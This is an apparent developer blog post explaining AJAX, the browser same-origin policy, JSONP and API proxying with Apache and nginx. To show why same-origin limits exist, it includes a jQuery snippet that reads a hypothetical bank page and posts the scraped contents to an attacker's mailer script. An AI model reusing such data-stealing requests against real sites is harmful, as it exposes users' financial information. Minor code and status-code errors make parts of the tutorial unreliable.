Intro & A quick primer on how to JSONP-ify APIs that do not support it


Sebastien Renauld

Welcome to this blog!

I'm still building this website, but will attempt to regularly update this blog with the latest news, some how-tos, reactions over the seemingly recurrent StackOverflow bugs (a great indicator of what programmers struggle with, of sorts), primers on slightly shadier parts of web development (purely for information purposes and in an effort to put a spotlight on malpractices), and general code-fu.

The first article will deal with remote APIs and something, I think, we've all hit our heads against: how to break JavaScript remote calls (AJAX being one of them) out of the same-domain-origin sandbox...and what to do when none of these situations apply. On the menu:

  1. A quick primer on AJAX (native and jQuery examples)
  2. The nature and role of cross-origin sandboxing: CSRF hack-fu
  3. JSONP - or how to break out... with some conditions
  4. What to do when JSONP is not supported by the endpoint
  5. Data proxying - introducing reScrape

Read on!

A quick primer on AJAX (native and jQuery examples)

AJAX, as its name suggests (Asynchronous Javascript and XML - but nowadays mostly JSON), allows a developer to asynchronously fetch content from a source outside the page, and seeing as JS can run without a page re-load, update the page on-the-fly as content comes in. It is one of the pillars of modern, responsive websites, and a seemingly vital component to some sites (Facebook immediately comes to mind). Its invention also sparked a wide array of new concepts, which were completely alien before.

A bit of history - AJAX was possible ever since the Microsoft XMLHTTP ActiveX component was on IE. In a nutshell, think IE5, maybe 4. Until IE8, IE-based browsers and rendering engines used a completely different structure to other browsers to call other URIs, and thankfully, IE8 and IE9 (and now IE10) now follow everyone. Before Jesse J. Garrett named it that way, the technique was almost purely used for Outlook purposes. It then rapidly grew in popularity, and also in refinement.

Making an AJAX request to a resource is now a much easier step than it was five years ago, depending on whether you have to support oldIE or not. If you do, your code will look like this:

function XHR() {
  var transport;
  if(window.XMLHttpRequest) {
    transport = new XMLHttpRequest();
  }else{
    // check for version 6 before version 3
    try{ transport = new ActiveXObject("MSXML2.XMLHTTP.6.0");  }catch(e){}
    try{ if(!transport) transport = new ActiveXObject("MSXML2.XMLHTTP");  }catch(e){}
  }
  return transport;
}
function myRequest(URI) {
   var transportLayer = XHR();
   transportLayer.onreadystatechange = function() {
    if (transportLayer.readyState == 4) {
      switch (transportLayer.status) {
        case 200:
          break;
      }
    }
  };
  transportLayer.open("GET",URI,true);
  transportLayer.send(null);
};
}

Note a few things on this:

  • The switch in myRequest() allows you to add more cases - pretty common are 301 (redirect - permanent), 302 (redirect - temporary), 201 (OK), 500 (whoops, I killed it) and 404 (whoops, wrong door)
  • It is possible to define the request type (GET, POST, PUT, DELETE, HEAD, OPTIONS etc) on the open() call. Note however that the newer HTTP verbs are   NOT AVAILABLE on old browsers (IE7 and before, typically)
  • The callback is done asynchronously - you do not need to freeze the browser to get your data (thus warranting the A of AJAX)
  • This code will fail if your visitor is running IE7 with ActiveX objects disabled

Nothing major, however. All this can be circumvented pretty easily - it is quite a bit of code for each request, so neatly wrapping it is a requirement. Cue jQuery:

function myRequest(URI) {
  return $.ajax({
    type: "GET",
    url: URI,
    dataType: "json",
    success: function(data) {
    }
  });
}

I used the long-hand version for clarity (and tend to use it anyway. More freedom). This has the added advantage of doing all the JSON (if dataType is set to json or jsonp) or XML (if dataType is set to "xml") processing and will provide the object data in the callback as the result of the request.

It also has the main advantage of taking care of all the browser incompatibilities/quirks for you (such as oldIE stuff, or the fact that oldIE doesn't have a JSON parser and code needs to be eval'd, or differences in URL encoding...). What this means is that you can work on the stuff that actually matters.

Now that you have your data, you can very easily do what you want: update your page with it, add elements, fire more requests... in theory, all is well in the best of worlds.

The nature and role of cross-origin sandboxing: CSRF hack-fu

...Or how allowing everyone to call anything is a pretty bad idea. That is the bottom line of it. Here is a classic example: suppose that anyone can ping anything on any domain using AJAX and get the data back. I happen to know that you're banking with bank A and that this bank has an online banking facility at www.mybank.site/secure/. In particular, they use frames and the amount of money on the account is on /secure/myMoney.htm (this isn't that uncommon). From my site, I could craft a request as follows:

$.ajax({
  url: "http://www.mybank.site/secure/myMoney.htm",
  type: "GET",
  dataType: "text",
  success: function(d) {
    $.ajax({
     url: "mailer.php",
     data: {
       "result": d
     },
     type: "POST"
    });
  }
});

I am quite simply setting up an AJAX call to ping the online banking site, scrape all the HTML from the page (courtesy of jQuery) and pinging it back to mailer.php locally, which will mail it/store it in a DB. If cross-origin restrictions were not in place, this would be possible (and it was until not too long ago!). In theory, I now have all your bank information. Thankfully, cross-origin restrictions were put in place pretty quickly (thank you Netscape, one of the few things you did!).

Cross-origin restrictions are as follows:

  1. Same host (exact)
  2. Same port
  3. Same protocol (http->https is not allowed)

Note on point 2: the domain:port match must be exact as shown in the URL bar. If your visitor accessed your site as mysite.com and you're requesting mysite.com:80, it will fail!

As you can see, this locks you out of quite a few cool things, including getting stuff from other domains. Fear not, there are ways (crude and elaborate!), and I'll do my best to cover them.

Also, if you are curious, IFRAMEs in JS come with the same restriction: it is impossible to get any data between the parent and child frames in a page where they do not share the exact host path.

JSONP - or how to break out... with some conditions

Breaking out of this same-origin cafoofle is not a simple matter. Every simple solution requires the remote provider to change their code, sometimes simply, sometimes drastically. I have picked the choice to talk about JSONP as other alternatives are only supported by modern browsers - though I will eventually cover them all.

JSONP (P stands for padding) is a way to go through the same-origin restriction by using a script tag. jQuery natively supports it, which is a pretty cool thing (datatype jsonp). It works, quite simply, by loading the content in a script tag (this might seem very weird at first if you're new to this. Bear with me, don't laugh) and taking chances with one extra parameter in the URL (usually callback=myname or _=myname). This parameter tells the source to output its results in a slightly different format: it will encapsulate the JSON data (this time, it has to be JSON. This technique doesn't work with XML) in a function call to the function called myname will be called with as first parameter the JSON object.

This has quite a number of implications:

  • For this to work, you'll need to temporarily store a closure in the global scope. This isn't a big deal - attach it to the window object
  • The source needs to understand that JSONP requires substantially different formatting. This is a big deal (as most site owners are lazy).
  • You have less control over the request using this method. For example, the furthest you can go in terms of control is whether the script tag loaded successfully (using a load event). You will not be able to get the request status code or additional header information.

When it works, it is awesome. When it doesn't... it is rather problematic. The only other possibility requires another change to the source's output in the form of a header (CORS, or cross-origin resource sharing). The other option is to proxy the API locally, and is a topic I'll cover in the last section as a tidbit of information - as I am currently working on a way to automate this process.

Data proxying - introducing reScrape

If you do not have access to your server's modules or are on a shared hosting platform, this solution will most likely not work, either. To bypass the same-origin restrictions, a simple way to do it is to turn the remote call into a local call. Depending on which HTTP daemon you're running, this could be called ProxyPass/ProxyPassReverse (apache2 with mod_proxy enabled) or proxy_pass (nginx). I'll briefly cover both.

Proxying on Apache2

To do this, you will need two new directives in your site's config, as follows:

ProxyPass /my_api/ http://my.remote.api/url/
ProxyPassReverse /my_api/ http://my.remote.api/url/

The URLs obviously need to be changed. This will proxy every call done to the directory my_api to the remote API. You will obviously want to make it slightly more generic.

This solution requires mod_proxy, which is not enabled by default on apache builds. Don't rely on it.

Proxying on nginx

nginx plays much more nicely, as proxy_pass is enabled by default (nginx is a proxy before being a webserver). The downside is that you cannot modify the config unless you own the server. If you do, add this:

location api {
                proxy_pass http://path.to.my/api/;
                proxy_redirect off;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header Host $http_host;
                proxy_set_header X-NginX-Proxy true;
}

Same caveats as Apache.

If you cannot do either, you'll require a third-party service to do it for you. I am currently building such a service, and intend to release it for free & paid usage as soon as possible. Stay tuned!


0 Comment